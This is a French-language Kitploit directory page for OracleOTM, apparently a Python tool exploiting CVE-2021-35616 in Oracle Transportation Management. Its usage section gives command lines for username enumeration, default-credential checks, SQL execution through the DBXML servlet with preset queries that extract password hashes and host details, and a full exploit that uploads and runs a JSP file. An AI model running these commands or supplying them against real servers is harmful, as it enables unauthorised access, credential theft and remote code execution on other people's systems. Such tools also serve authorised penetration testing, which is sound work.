Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/ofirhamam/oracleotm
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionSécurité des Bases de Données
GitHubofirhamam/oracleotm

OracleOTM

Outil Python pour exploiter la CVE-2021-35616

Voir le dépôt
1112il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

OracleOTM

Outil Python pour exploiter la CVE-2021-35616

Le script fonctionne par modules, que j’ai implémentés dans l’ordre suivant :

► Énumération des noms d’utilisateur

► Recherche d’identifiants par défaut

► Exécution d’une requête SQL via le servlet DBXML

► Exploitation complète et exécution JSP

La syntaxe du script est la suivante :

.\OracleOTM.py {module} {host TXT file} {additional parameters}

Énumération des noms d’utilisateur : .\OracleOTM.py enum {hosts TXT file} -u users.txt

Recherche d’identifiants par défaut : .\OracleOTM.py default {hosts TXT file}

Exécution d’une requête SQL via le servlet DBXML : .\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"

J’ai également préparé quelques requêtes prédéfinies que j’ai trouvées utiles ; vous pouvez y accéder directement, comme suit :

.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os

root@kitploit:~
OS – Extraire le système d’exploitation du serveur 

Osuser – Extraire l’utilisateur du système d’exploitation exécutant la base de données

Hostname – Nom d’hôte du serveur de base de données 

Hostip – Adresse IP du serveur de base de données 

Passwords – Extrait les utilisateurs OTM et leurs mots de passe hachés

 Oraversion – La version de la base de données 

Dbusershash – Les hachages des mots de passe des utilisateurs de la base de données

Dbfileslocation – L’emplacement des fichiers de la base de données dans le système d’exploitation

Exploitation complète et exécution JSP : .\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"

Télécharger l’outil